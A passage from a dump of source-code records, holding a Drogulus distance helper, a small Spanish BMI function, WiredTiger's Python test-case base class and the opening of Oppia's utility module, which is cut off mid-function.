functions used in various different parts of\nDrogulus.\n\"\"\"\nfrom .constants import K\n\n\ndef distance(key_one, key_two):\n \"\"\"\n Calculate the XOR result between two string representations of hex values.\n Returned as an int.\n \"\"\"\n val_key_one = int(key_one, 16)\n val_key_two = int(key_two, 16)\n return val_key_one ^ val_key_two\n\n\ndef sort_peer_nodes(peer_nodes, target_key):\n \"\"\"\n Given a list of peer nodes, efficiently sorts it so that the peers closest\n to the target key are at the head. If the list is longer than K then only\n the K closest contacts will be returned.\n \"\"\"\n def node_key(node, target_key=target_key):\n \"\"\"\n Returns the node's distance to the target key.\n \"\"\"\n return distance(node.network_id, target_key)\n\n peer_nodes.sort(key=node_key)\n return peer_nodes[:K]\n"} {"ext": "py", "sha": "1a2fdd0290f3811fe758653f2b1b5980f836138d", "content": "def imc (peso,altura):\n valor = peso / altura **2\n if valor <18:\n return \"Delgadez\"\n elif valor <25:\n return \"Normal\"\n elif valor <29:\n return \"Sobrepeso\"\n else:\n return \"Obesidad\"\n \nvalor_imc = imc (58,1.55)\nprint (valor_imc)\n\n"} {"ext": "py", "sha": "1a2fddce03107c1b6356b81174debceb05409fdc", "content": "#!/usr/bin/env python\n#\n# Public Domain 2014-2018 MongoDB, Inc.\n# Public Domain 2008-2014 WiredTiger, Inc.\n#\n# This is free and unencumbered software released into the public domain.\n#\n# Anyone is free to copy, modify, publish, use, compile, sell, or\n# distribute this software, either in source code form or as a compiled\n# binary, for any purpose, commercial or non-commercial, and by any\n# means.\n#\n# In jurisdictions that recognize copyright laws, the author or authors\n# of this software dedicate any and all copyright interest in the\n# software to the public domain. We make this dedication for the benefit\n# of the public at large and to the detriment of our heirs and\n# successors. We intend this dedication to be an overt act of\n# relinquishment in perpetuity of all present and future rights to this\n# software under copyright law.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR\n# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,\n# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n#\n# WiredTigerTestCase\n# parent class for all test cases\n#\n\n# If unittest2 is available, use it in preference to (the old) unittest\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nfrom contextlib import contextmanager\nimport glob, os, re, shutil, sys, time, traceback\nimport wiredtiger, wtscenario\n\ndef shortenWithEllipsis(s, maxlen):\n if len(s) > maxlen:\n s = s[0:maxlen-3] + '...'\n return s\n\nclass CapturedFd(object):\n \"\"\"\n CapturedFd encapsulates a file descriptor (e.g. 1 or 2) that is diverted\n to a file. We use this to capture and check the C stdout/stderr.\n Meanwhile we reset Python's sys.stdout, sys.stderr, using duped copies\n of the original 1, 2 fds. The end result is that Python's sys.stdout\n sys.stderr behave normally (e.g. go to the tty), while the C stdout/stderr\n ends up in a file that we can verify.\n \"\"\"\n def __init__(self, filename, desc):\n self.filename = filename\n self.desc = desc\n self.expectpos = 0\n self.file = None\n\n def readFileFrom(self, filename, pos, maxchars):\n \"\"\"\n Read a file starting at a given position,\n returning the beginning of its contents\n \"\"\"\n with open(filename, 'r') as f:\n f.seek(pos)\n return shortenWithEllipsis(f.read(maxchars+1), maxchars)\n\n def capture(self):\n \"\"\"\n Start capturing the file descriptor.\n Note that the original targetFd is closed, we expect\n that the caller has duped it and passed the dup to us\n in the constructor.\n \"\"\"\n self.file = open(self.filename, 'w')\n return self.file\n\n def release(self):\n \"\"\"\n Stop capturing.\n \"\"\"\n self.file.close()\n self.file = None\n\n def check(self, testcase):\n \"\"\"\n Check to see that there is no unexpected output in the captured output\n file. If there is, raise it as a test failure.\n This is generally called after 'release' is called.\n \"\"\"\n if self.file != None:\n self.file.flush()\n filesize = os.path.getsize(self.filename)\n if filesize > self.expectpos:\n contents = self.readFileFrom(self.filename, self.expectpos, 10000)\n WiredTigerTestCase.prout('ERROR: ' + self.filename +\n ' unexpected ' + self.desc +\n ', contains:\\n\"' + contents + '\"')\n testcase.fail('unexpected ' + self.desc + ', contains: \"' +\n contents + '\"')\n self.expectpos = filesize\n\n def checkAdditional(self, testcase, expect):\n \"\"\"\n Check to see that an additional string has been added to the\n output file. If it has not, raise it as a test failure.\n In any case, reset the expected pos to account for the new output.\n \"\"\"\n if self.file != None:\n self.file.flush()\n gotstr = self.readFileFrom(self.filename, self.expectpos, 1000)\n testcase.assertEqual(gotstr, expect, 'in ' + self.desc +\n ', expected \"' + expect + '\", but got \"' +\n gotstr + '\"')\n self.expectpos = os.path.getsize(self.filename)\n\n def checkAdditionalPattern(self, testcase, pat):\n \"\"\"\n Check to see that an additional string has been added to the\n output file. If it has not, raise it as a test failure.\n In any case, reset the expected pos to account for the new output.\n \"\"\"\n if self.file != None:\n self.file.flush()\n gotstr = self.readFileFrom(self.filename, self.expectpos, 1000)\n if re.search(pat, gotstr) == None:\n testcase.fail('in ' + self.desc +\n ', expected pattern \"' + pat + '\", but got \"' +\n gotstr + '\"')\n self.expectpos = os.path.getsize(self.filename)\n\nclass TestSuiteConnection(object):\n def __init__(self, conn, connlist):\n connlist.append(conn)\n self._conn = conn\n self._connlist = connlist\n\n def close(self, config=''):\n self._connlist.remove(self._conn)\n return self._conn.close(config)\n\n # Proxy everything except what we explicitly define to the\n # wrapped connection\n def __getattr__(self, attr):\n if attr in self.__dict__:\n return getattr(self, attr)\n else:\n return getattr(self._conn, attr)\n\n# Just like a list of strings, but with a convenience function\nclass ExtensionList(list):\n skipIfMissing = False\n def extension(self, dirname, name, extarg=None):\n if name != None and name != 'none':\n ext = '' if extarg == None else '=' + extarg\n self.append(dirname + '/' + name + ext)\n\nclass WiredTigerTestCase(unittest.TestCase):\n _globalSetup = False\n _printOnceSeen = {}\n\n # conn_config can be overridden to add to basic connection configuration.\n # Can be a string or a callable function or lambda expression.\n conn_config = ''\n\n # session_config can be overridden to add to basic session configuration.\n # Can be a string or a callable function or lambda expression.\n session_config = ''\n\n # conn_extensions can be overridden to add a list of extensions to load.\n # Each entry is a string (directory and extension name) and optional config.\n # Example:\n # conn_extensions = ('extractors/csv_extractor',\n # 'test/fail_fs={allow_writes=100}')\n conn_extensions = ()\n\n @staticmethod\n def globalSetup(preserveFiles = False, useTimestamp = False,\n gdbSub = False, lldbSub = False, verbose = 1, builddir = None, dirarg = None,\n longtest = False):\n WiredTigerTestCase._preserveFiles = preserveFiles\n d = 'WT_TEST' if dirarg == None else dirarg\n if useTimestamp:\n d += '.' + time.strftime('%Y%m%d-%H%M%S', time.localtime())\n shutil.rmtree(d, ignore_errors=True)\n os.makedirs(d)\n wtscenario.set_long_run(longtest)\n WiredTigerTestCase._parentTestdir = d\n WiredTigerTestCase._builddir = builddir\n WiredTigerTestCase._origcwd = os.getcwd()\n WiredTigerTestCase._resultfile = open(os.path.join(d, 'results.txt'), \"w\", 0) # unbuffered\n WiredTigerTestCase._gdbSubprocess = gdbSub\n WiredTigerTestCase._lldbSubprocess = lldbSub\n WiredTigerTestCase._longtest = longtest\n WiredTigerTestCase._verbose = verbose\n WiredTigerTestCase._dupout = os.dup(sys.stdout.fileno())\n WiredTigerTestCase._stdout = sys.stdout\n WiredTigerTestCase._stderr = sys.stderr\n WiredTigerTestCase._concurrent = False\n WiredTigerTestCase._globalSetup = True\n WiredTigerTestCase._ttyDescriptor = None\n\n def fdSetUp(self):\n self.captureout = CapturedFd('stdout.txt', 'standard output')\n self.captureerr = CapturedFd('stderr.txt', 'error output')\n sys.stdout = self.captureout.capture()\n sys.stderr = self.captureerr.capture()\n\n def fdTearDown(self):\n # restore stderr/stdout\n self.captureout.release()\n self.captureerr.release()\n sys.stdout = WiredTigerTestCase._stdout\n sys.stderr = WiredTigerTestCase._stderr\n\n def __init__(self, *args, **kwargs):\n if hasattr(self, 'scenarios'):\n assert(len(self.scenarios) == len(dict(self.scenarios)))\n unittest.TestCase.__init__(self, *args, **kwargs)\n if not self._globalSetup:\n WiredTigerTestCase.globalSetup()\n\n def __str__(self):\n # when running with scenarios, if the number_scenarios() method\n # is used, then each scenario is given a number, which can\n # help distinguish tests.\n scen = ''\n if hasattr(self, 'scenario_number') and hasattr(self, 'scenario_name'):\n scen = ' -s ' + str(self.scenario_number) + \\\n ' (' + self.scenario_name + ')'\n return self.simpleName() + scen\n\n def shortDesc(self):\n ret_str = ''\n if hasattr(self, 'scenario_number'):\n ret_str = ' -s ' + str(self.scenario_number)\n return self.simpleName() + ret_str\n\n def simpleName(self):\n return \"%s.%s.%s\" % (self.__module__,\n self.className(), self._testMethodName)\n\n # Return the wiredtiger_open extension argument for\n # any needed shared library.\n def extensionsConfig(self):\n exts = self.conn_extensions\n if hasattr(exts, '__call__'):\n exts = ExtensionList()\n self.conn_extensions(exts)\n result = ''\n extfiles = {}\n skipIfMissing = False\n if hasattr(exts, 'skip_if_missing'):\n skipIfMissing = exts.skip_if_missing\n for ext in exts:\n extconf = ''\n if '=' in ext:\n splits = ext.split('=', 1)\n ext = splits[0]\n extconf = '=' + splits[1]\n splits = ext.split('/')\n if len(splits) != 2:\n raise Exception(self.shortid() +\n \": \" + ext +\n \": extension is not named /\")\n libname = splits[1]\n dirname = splits[0]\n pat = os.path.join(WiredTigerTestCase._builddir, 'ext',\n dirname, libname, '.libs', 'libwiredtiger_*.so')\n filenames = glob.glob(pat)\n if len(filenames) == 0:\n if skipIfMissing:\n self.skipTest('extension \"' + ext + '\" not built')\n continue\n else:\n raise Exception(self.shortid() +\n \": \" + ext +\n \": no extensions library found matching: \" + pat)\n elif len(filenames) > 1:\n raise Exception(self.shortid() +\n \": \" + ext +\n \": multiple extensions libraries found matching: \" + pat)\n complete = '\"' + filenames[0] + '\"' + extconf\n if ext in extfiles:\n if extfiles[ext] != complete:\n raise Exception(self.shortid() +\n \": non-matching extension arguments in \" +\n str(exts))\n else:\n extfiles[ext] = complete\n if len(extfiles) != 0:\n result = ',extensions=[' + ','.join(extfiles.values()) + ']'\n return result\n\n # Can be overridden, but first consider setting self.conn_config\n # or self.conn_extensions\n def setUpConnectionOpen(self, home):\n self.home = home\n config = self.conn_config\n if hasattr(config, '__call__'):\n config = self.conn_config()\n config += self.extensionsConfig()\n # In case the open starts additional threads, flush first to\n # avoid confusion.\n sys.stdout.flush()\n conn_param = 'create,error_prefix=\"%s\",%s' % (self.shortid(), config)\n try:\n conn = self.wiredtiger_open(home, conn_param)\n except wiredtiger.WiredTigerError as e:\n print \"Failed wiredtiger_open: dir '%s', config '%s'\" % \\\n (home, conn_param)\n raise e\n self.pr(`conn`)\n return conn\n\n # Replacement for wiredtiger.wiredtiger_open that returns\n # a proxied connection that knows to close it itself at the\n # end of the run, unless it was already closed.\n def wiredtiger_open(self, home=None, config=''):\n conn = wiredtiger.wiredtiger_open(home, config)\n return TestSuiteConnection(conn, self._connections)\n\n # Can be overridden, but first consider setting self.session_config\n def setUpSessionOpen(self, conn):\n config = self.session_config\n if hasattr(config, '__call__'):\n config = self.session_config()\n return conn.open_session(config)\n\n # Can be overridden\n def close_conn(self, config=''):\n \"\"\"\n Close the connection if already open.\n \"\"\"\n if self.conn != None:\n self.conn.close(config)\n self.conn = None\n\n def open_conn(self, directory=\".\", config=None):\n \"\"\"\n Open the connection if already closed.\n \"\"\"\n if self.conn == None:\n if config != None:\n self._old_config = self.conn_config\n self.conn_config = config\n self.conn = self.setUpConnectionOpen(directory)\n if config != None:\n self.conn_config = self._old_config\n self.session = self.setUpSessionOpen(self.conn)\n\n def reopen_conn(self, directory=\".\", config=None):\n \"\"\"\n Reopen the connection.\n \"\"\"\n self.close_conn()\n self.open_conn(directory, config)\n\n def setUp(self):\n if not hasattr(self.__class__, 'wt_ntests'):\n self.__class__.wt_ntests = 0\n if WiredTigerTestCase._concurrent:\n self.testsubdir = self.shortid() + '.' + str(self.__class__.wt_ntests)\n else:\n self.testsubdir = self.className() + '.' + str(self.__class__.wt_ntests)\n self.testdir = os.path.join(WiredTigerTestCase._parentTestdir, self.testsubdir)\n self.__class__.wt_ntests += 1\n self.starttime = time.time()\n if WiredTigerTestCase._verbose > 2:\n self.prhead('started in ' + self.testdir, True)\n # tearDown needs connections list, set it here in case the open fails.\n self._connections = []\n self.origcwd = os.getcwd()\n shutil.rmtree(self.testdir, ignore_errors=True)\n if os.path.exists(self.testdir):\n raise Exception(self.testdir + \": cannot remove directory\")\n os.makedirs(self.testdir)\n os.chdir(self.testdir)\n with open('testname.txt', 'w+') as namefile:\n namefile.write(str(self) + '\\n')\n self.fdSetUp()\n # tearDown needs a conn field, set it here in case the open fails.\n self.conn = None\n try:\n self.conn = self.setUpConnectionOpen(\".\")\n self.session = self.setUpSessionOpen(self.conn)\n except:\n self.tearDown()\n raise\n\n def tearDown(self):\n excinfo = sys.exc_info()\n passed = (excinfo == (None, None, None))\n if passed:\n skipped = False\n else:\n skipped = (excinfo[0] == unittest.SkipTest)\n self.pr('finishing')\n\n # Close all connections that weren't explicitly closed.\n # Connections left open (as a result of a test failure)\n # can result in cascading errors. We also make sure\n # self.conn is on the list of active connections.\n if not self.conn in self._connections:\n self._connections.append(self.conn)\n for conn in self._connections:\n try:\n conn.close()\n except:\n pass\n self._connections = []\n\n try:\n self.fdTearDown()\n # Only check for unexpected output if the test passed\n if passed:\n self.captureout.check(self)\n self.captureerr.check(self)\n finally:\n # always get back to original directory\n os.chdir(self.origcwd)\n\n # Make sure no read-only files or directories were left behind\n os.chmod(self.testdir, 0777)\n for root, dirs, files in os.walk(self.testdir):\n for d in dirs:\n os.chmod(os.path.join(root, d), 0777)\n for f in files:\n os.chmod(os.path.join(root, f), 0666)\n\n # Clean up unless there's a failure\n if (passed or skipped) and not WiredTigerTestCase._preserveFiles:\n shutil.rmtree(self.testdir, ignore_errors=True)\n else:\n self.pr('preserving directory ' + self.testdir)\n\n elapsed = time.time() - self.starttime\n if elapsed > 0.001 and WiredTigerTestCase._verbose >= 2:\n print \"%s: %.2f seconds\" % (str(self), elapsed)\n if not passed and not skipped:\n print \"ERROR in \" + str(self)\n self.pr('FAIL')\n self.prexception(excinfo)\n self.pr('preserving directory ' + self.testdir)\n if WiredTigerTestCase._verbose > 2:\n self.prhead('TEST COMPLETED')\n\n def backup(self, backup_dir, session=None):\n if session is None:\n session = self.session\n shutil.rmtree(backup_dir, ignore_errors=True)\n os.mkdir(backup_dir)\n bkp_cursor = session.open_cursor('backup:', None, None)\n while True:\n ret = bkp_cursor.next()\n if ret != 0:\n break\n shutil.copy(bkp_cursor.get_key(), backup_dir)\n self.assertEqual(ret, wiredtiger.WT_NOTFOUND)\n bkp_cursor.close()\n\n @contextmanager\n def expectedStdout(self, expect):\n self.captureout.check(self)\n yield\n self.captureout.checkAdditional(self, expect)\n\n @contextmanager\n def expectedStderr(self, expect):\n self.captureerr.check(self)\n yield\n self.captureerr.checkAdditional(self, expect)\n\n @contextmanager\n def expectedStdoutPattern(self, pat):\n self.captureout.check(self)\n yield\n self.captureout.checkAdditionalPattern(self, pat)\n\n @contextmanager\n def expectedStderrPattern(self, pat):\n self.captureerr.check(self)\n yield\n self.captureerr.checkAdditionalPattern(self, pat)\n\n def assertRaisesWithMessage(self, exceptionType, expr, message):\n \"\"\"\n Like TestCase.assertRaises(), but also checks to see\n that a message is printed on stderr. If message starts\n and ends with a slash, it is considered a pattern that\n must appear in stderr (it need not encompass the entire\n error output). Otherwise, the message must match verbatim,\n including any trailing newlines.\n \"\"\"\n if len(message) > 2 and message[0] == '/' and message[-1] == '/':\n with self.expectedStderrPattern(message[1:-1]):\n self.assertRaises(exceptionType, expr)\n else:\n with self.expectedStderr(message):\n self.assertRaises(exceptionType, expr)\n\n def assertRaisesException(self, exceptionType, expr,\n exceptionString=None, optional=False):\n \"\"\"\n Like TestCase.assertRaises(), with some additional options.\n If the exceptionString argument is used, the exception's string\n must match it. If optional is set, then no assertion occurs\n if the exception doesn't occur.\n Returns true if the assertion is raised.\n \"\"\"\n raised = False\n try:\n expr()\n except BaseException, err:\n if not isinstance(err, exceptionType):\n self.fail('Exception of incorrect type raised, got type: ' + \\\n str(type(err)))\n if exceptionString != None and exceptionString != str(err):\n self.fail('Exception with incorrect string raised, got: \"' + \\\n str(err) + '\"')\n raised = True\n if not raised and not optional:\n self.fail('no assertion raised')\n return raised\n\n def raisesBusy(self, expr):\n \"\"\"\n Execute the expression, returning true if a 'Resource busy'\n exception is raised, returning false if no exception is raised.\n Any other exception raises a test suite failure.\n \"\"\"\n return self.assertRaisesException(wiredtiger.WiredTigerError, \\\n expr, exceptionString='Resource busy', optional=True)\n\n def assertTimestampsEqual(self, ts1, ts2):\n \"\"\"\n TestCase.assertEqual() for timestamps\n \"\"\"\n self.assertEqual(int(ts1, 16), int(ts2, 16))\n\n def exceptionToStderr(self, expr):\n \"\"\"\n Used by assertRaisesHavingMessage to convert an expression\n that throws an error to an expression that throws the\n same error but also has the exception string on stderr.\n \"\"\"\n try:\n expr()\n except BaseException, err:\n sys.stderr.write('Exception: ' + str(err))\n raise\n\n def assertRaisesHavingMessage(self, exceptionType, expr, message):\n \"\"\"\n Like TestCase.assertRaises(), but also checks to see\n that the assert exception, when string-ified, includes a message.\n If message starts and ends with a slash, it is considered a pattern that\n must appear (it need not encompass the entire message).\n Otherwise, the message must match verbatim.\n \"\"\"\n self.assertRaisesWithMessage(\n exceptionType, lambda: self.exceptionToStderr(expr), message)\n\n @staticmethod\n def printOnce(msg):\n # There's a race condition with multiple threads,\n # but we won't worry about it. We err on the side\n # of printing the message too many times.\n if not msg in WiredTigerTestCase._printOnceSeen:\n WiredTigerTestCase._printOnceSeen[msg] = msg\n WiredTigerTestCase.prout(msg)\n\n def KNOWN_FAILURE(self, name):\n myname = self.simpleName()\n msg = '**** ' + myname + ' HAS A KNOWN FAILURE: ' + name + ' ****'\n self.printOnce(msg)\n self.skipTest('KNOWN FAILURE: ' + name)\n\n def KNOWN_LIMITATION(self, name):\n myname = self.simpleName()\n msg = '**** ' + myname + ' HAS A KNOWN LIMITATION: ' + name + ' ****'\n self.printOnce(msg)\n\n @staticmethod\n def printVerbose(level, message):\n if level <= WiredTigerTestCase._verbose:\n WiredTigerTestCase.prout(message)\n\n def verbose(self, level, message):\n WiredTigerTestCase.printVerbose(level, message)\n\n def prout(self, s):\n WiredTigerTestCase.prout(s)\n\n @staticmethod\n def prout(s):\n os.write(WiredTigerTestCase._dupout, s + '\\n')\n\n def pr(self, s):\n \"\"\"\n print a progress line for testing\n \"\"\"\n msg = ' ' + self.shortid() + ': ' + s\n WiredTigerTestCase._resultfile.write(msg + '\\n')\n\n def prhead(self, s, *beginning):\n \"\"\"\n print a header line for testing, something important\n \"\"\"\n msg = ''\n if len(beginning) > 0:\n msg += '\\n'\n msg += ' ' + self.shortid() + ': ' + s\n self.prout(msg)\n WiredTigerTestCase._resultfile.write(msg + '\\n')\n\n def prexception(self, excinfo):\n WiredTigerTestCase._resultfile.write('\\n')\n traceback.print_exception(excinfo[0], excinfo[1], excinfo[2], None, WiredTigerTestCase._resultfile)\n WiredTigerTestCase._resultfile.write('\\n')\n\n # print directly to tty, useful for debugging\n def tty(self, message):\n WiredTigerTestCase.tty(message)\n\n @staticmethod\n def tty(message):\n if WiredTigerTestCase._ttyDescriptor == None:\n WiredTigerTestCase._ttyDescriptor = open('/dev/tty', 'w')\n WiredTigerTestCase._ttyDescriptor.write(message + '\\n')\n\n def ttyVerbose(self, level, message):\n WiredTigerTestCase.ttyVerbose(level, message)\n\n @staticmethod\n def ttyVerbose(level, message):\n if level <= WiredTigerTestCase._verbose:\n WiredTigerTestCase.tty(message)\n\n def shortid(self):\n return self.id().replace(\"__main__.\",\"\")\n\n def className(self):\n return self.__class__.__name__\n\ndef longtest(description):\n \"\"\"\n Used as a function decorator, for example, @wttest.longtest(\"description\").\n The decorator indicates that this test function should only be included\n when running the test suite with the --long option.\n \"\"\"\n def runit_decorator(func):\n return func\n if not WiredTigerTestCase._longtest:\n return unittest.skip(description + ' (enable with --long)')\n else:\n return runit_decorator\n\ndef islongtest():\n return WiredTigerTestCase._longtest\n\ndef runsuite(suite, parallel):\n suite_to_run = suite\n if parallel > 1:\n from concurrencytest import ConcurrentTestSuite, fork_for_tests\n if not WiredTigerTestCase._globalSetup:\n WiredTigerTestCase.globalSetup()\n WiredTigerTestCase._concurrent = True\n suite_to_run = ConcurrentTestSuite(suite, fork_for_tests(parallel))\n try:\n return unittest.TextTestRunner(\n verbosity=WiredTigerTestCase._verbose).run(suite_to_run)\n except BaseException as e:\n # This should not happen for regular test errors, unittest should catch everything\n print('ERROR: running test: ', e)\n raise e\n\ndef run(name='__main__'):\n result = runsuite(unittest.TestLoader().loadTestsFromName(name), False)\n sys.exit(0 if result.wasSuccessful() else 1)\n"} {"ext": "py", "sha": "1a2fde60eade4ec61d78ac03634d61eca65b86a7", "content": "# Copyright 2014 The Oppia Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Common utility functions.\"\"\"\n\nfrom __future__ import absolute_import # pylint: disable=import-only-modules\nfrom __future__ import unicode_literals # pylint: disable=import-only-modules\n\nimport base64\nimport collections\nimport datetime\nimport hashlib\nimport imghdr\nimport json\nimport os\nimport random\nimport re\nimport string\nimport sys\nimport time\nimport unicodedata\nimport zlib\n\nfrom constants import constants\nimport feconf\nimport python_utils\n\n_YAML_PATH = os.path.join(os.getcwd(), '..', 'oppia_tools', 'pyyaml-5.1.2')\nsys.path.insert(0, _YAML_PATH)\n\nimport yaml # isort:skip #pylint: disable=wrong-import-position\n\nDATETIME_FORMAT = '%m/%d/%Y, %H:%M:%S:%f'\nPNG_DATA_URL_PREFIX = 'data:image/png;base64,'\nSECONDS_IN_HOUR = 60 * 60\nSECONDS_IN_MINUTE = 60\n\n\nclass InvalidInputException(Exception):\n \"\"\"Error class for invalid input.\"\"\"\n\n pass\n\n\nclass ValidationError(Exception):\n \"\"\"Error class for when a domain object fails validation.\"\"\"\n\n pass\n\n\nclass ExplorationConversionError(Exception):\n \"\"\"Error class for when an exploration fails to convert from a certain\n version to a certain version.\n \"\"\"\n\n pass\n\n\ndef create_enum(*sequential, **names):\n \"\"\"Creates a enumerated constant.\n\n Args:\n *sequential: *. Sequence List to generate the enumerations.\n **names: *. Names of the enumerration.\n\n Returns:\n dict. Dictionary containing the enumerated constants.\n \"\"\"\n enums = dict(python_utils.ZIP(sequential, sequential), **names)\n return type(b'Enum', (), enums)\n\n\ndef get_file_contents(filepath, raw_bytes=False, mode='r'):\n \"\"\"Gets the contents of a file, given a relative filepath from oppia/.\n\n Args:\n filepath: str. A full path to the file.\n raw_bytes: bool. Flag for the raw_bytes output.\n mode: str. File opening mode, default is in read mode.\n\n Returns:\n *. Either the raw_bytes stream if the flag is set or the\n decoded stream in utf-8 format.\n \"\"\"\n if raw_bytes:\n mode = 'rb'\n encoding = None\n else:\n encoding = 'utf-8'\n\n with python_utils.open_file(filepath, mode, encoding=encoding) as f:\n return f.read()\n\n\ndef get_exploration_components_from_dir(dir_path):\n \"\"\"Gets the (yaml, assets) from the contents of an exploration data dir.\n\n Args:\n dir_path: str. A full path to the exploration root directory.\n\n Returns:\n *. A 2-tuple, the first element of which is a yaml string, and the\n second element of which is a list of (filepath, content) 2-tuples.\n The filepath does not include the assets/ prefix.\n\n Raises:\n Exception. If the following condition doesn't hold: \"There\n is exactly one file not in assets/, and this file has a\n .yaml suffix\".\n \"\"\"\n yaml_content = None\n assets_list = []\n\n dir_path_array = dir_path.split('/')\n while dir_path_array[-1] == '':\n dir_path_array = dir_path_array[:-1]\n dir_path_length = len(dir_path_array)\n\n for root, directories, files in os.walk(dir_path):\n for directory in directories:\n if root == dir_path and directory != 'assets':\n raise Exception(\n 'The only directory in %s should be assets/' % dir_path)\n\n for filename in files:\n filepath = os.path.join(root, filename)\n if root == dir_path:\n # These files are added automatically by Mac OS Xsystems.\n # We ignore them.\n if not filepath.endswith('.DS_Store'):\n if yaml_content is not None:\n raise Exception(\n 'More than one non-asset file specified '\n 'for %s' % dir_path)\n elif not filepath.endswith('.yaml'):\n raise Exception(\n 'Found invalid non-asset file %s. There '\n 'should only be a single non-asset file, '\n 'and it should have a .yaml suffix.' % filepath)\n else:\n yaml_content = get_file_contents(filepath)\n else:\n filepath_array = filepath.split('/')\n # The additional offset is to remove the 'assets/' prefix.\n filename = '/'.join(filepath_array[dir_path_length + 1:])\n assets_list.append((filename, get_file_contents(\n filepath, raw_bytes=True)))\n\n if yaml_content is None:\n raise Exception('No yaml file specifed for %s' % dir_path)\n\n return yaml_content, assets_list\n\n\ndef get_comma_sep_string_from_list(items):\n \"\"\"Turns a list of items into a comma-separated string.\n\n Args:\n items: list(str). List of the items.\n\n Returns:\n str. String containing the items in the list separated by commas.\n \"\"\"\n\n if not items:\n return ''\n\n if len(items) == 1:\n return items[0]\n\n return '%s and %s' % (', '.join(items[:-1]), items[-1])\n\n\ndef to_ascii(input_string):\n \"\"\"Change unicode characters in a string to ascii if possible.\n\n Args:\n input_string: str. String to convert.\n\n Returns:\n str. String containing the ascii representation of the input string.\n \"\"\"\n return unicodedata.normalize(\n 'NFKD', python_utils.UNICODE(input_string)).encode('ascii', 'ignore')\n\n\ndef dict_from_yaml(yaml_str):\n \"\"\"Gets the dict representation of a YAML string.\n\n Args:\n yaml_str: str. Yaml string for conversion into dict.\n\n Returns:\n dict. Parsed dict representation of the yaml string.\n\n Raises:\n InavlidInputException. If the yaml string sent as the\n parameter is unable to get parsed, them this error gets\n raised.\n \"\"\"\n try:\n retrieved_dict = yaml.safe_load(yaml_str)\n assert isinstance(retrieved_dict, dict)\n return retrieved_dict\n except (AssertionError, yaml.YAMLError) as e:\n raise InvalidInputException(e)\n\n\ndef recursively_remove_key(obj, key_to_remove):\n \"\"\"Recursively removes keys from a list or dict.\n\n Args:\n obj: *. List or dict passed for which the keys has to\n be removed.\n key_to_remove: str. Key value that has to be removed.\n\n Returns:\n *. Dict or list with a particular key value removed.\n \"\"\"\n if isinstance(obj, list):\n for item in obj:\n recursively_remove_key(item, key_to_remove)\n elif isinstance(obj, dict):\n if key_to_remove in obj:\n del obj[key_to_remove]\n for key, unused_value in obj.items():\n recursively_remove_key(obj[key], key_to_remove)\n\n\ndef get_random_int(upper_bound):\n \"\"\"Returns a random integer in [0, upper_bound).\n\n Args:\n upper_bound: int. Upper limit for generation of random\n integer.\n\n Returns:\n int. Randomly generated integer less than the upper_bound.\n \"\"\"\n assert upper_bound >= 0 and isinstance(upper_bound, int)\n\n generator = random.SystemRandom()\n return generator.randrange(0, stop=upper_bound)\n\n\ndef get_random_choice(alist):\n \"\"\"Gets a random element from a list.\n\n Args:\n alist: list(*). Input to get a random choice.\n\n Returns:\n *. Random element choosen from the passed input list.\n \"\"\"\n assert isinstance(alist, list) and len(alist) > 0\n\n index = get_random_int(len(alist))\n return alist[index]\n\n\ndef convert_png_data_url_to_binary(image_data_url):\n \"\"\"Converts a PNG base64 data URL to a PNG binary data.\n\n Args:\n image_data_url: str. A string that is to be interpreted as a PNG\n data URL.\n\n Returns:\n str. Binary content of the PNG created from the data URL.\n\n Raises:\n Exception. The given string does not represent a PNG data URL.\n \"\"\"\n if image_data_url.startswith(PNG_DATA_URL_PREFIX):\n return base64.b64decode(\n python_utils.urllib_unquote(\n image_data_url[len(PNG_DATA_URL_PREFIX):]))\n else:\n raise Exception('The given string does not represent a PNG data URL.')\n\n\ndef convert_png_binary_to_data_url(content):\n \"\"\"Converts a PNG image string (represented by 'content') to a data URL.\n\n Args:\n content: str. PNG binary file content.\n\n Returns:\n str. Data URL created from the binary content of the PNG.\n\n Raises:\n Exception. The given binary string does not represent a PNG image.\n \"\"\"\n if imghdr.what(None, h=content) == 'png':\n return '%s%s' % (\n PNG_DATA_URL_PREFIX,\n python_utils.url_quote(base64.b64encode(content))\n )\n else:\n raise Exception('The given string does not represent a PNG image.')\n\n\ndef convert_png_to_data_url(filepath):\n \"\"\"Converts the png file at filepath to a data URL.\n\n Args:\n filepath: str. A full path to the file.\n\n Returns:\n str. Data url created from the filepath of the PNG.\n \"\"\"\n file_contents = get_file_contents(filepath, raw_bytes=True, mode='rb')\n return convert_png_binary_to_data_url(file_contents)\n\n\ndef camelcase_to_hyphenated(camelcase_str):\n \"\"\"Camelcase to hyhpenated conversion of the passed string.\n\n Args:\n camelcase_str: str. Camelcase string representation.\n\n Returns:\n str. Hypenated string representation of the camelcase string.\n \"\"\"\n intermediate_str = re.sub('(.)([A-Z][a-z]+)', r'\\1-\\2', camelcase_str)\n return re.sub('([a-z0-9])([A-Z])', r'\\1-\\2', intermediate_str).lower()\n\n\ndef camelcase_to_snakecase(camelcase_str):\n \"\"\"Camelcase to snake case conversion of the passed string.\n\n Args:\n camelcase_str: str. Camelcase string representation.\n\n Returns:\n str. Snakecase representation of the passed camelcase string.\n \"\"\"\n intermediate_str = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', camelcase_str)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', intermediate_str).lower()\n\n\ndef set_url_query_parameter(url, param_name, param_value):\n \"\"\"Set or 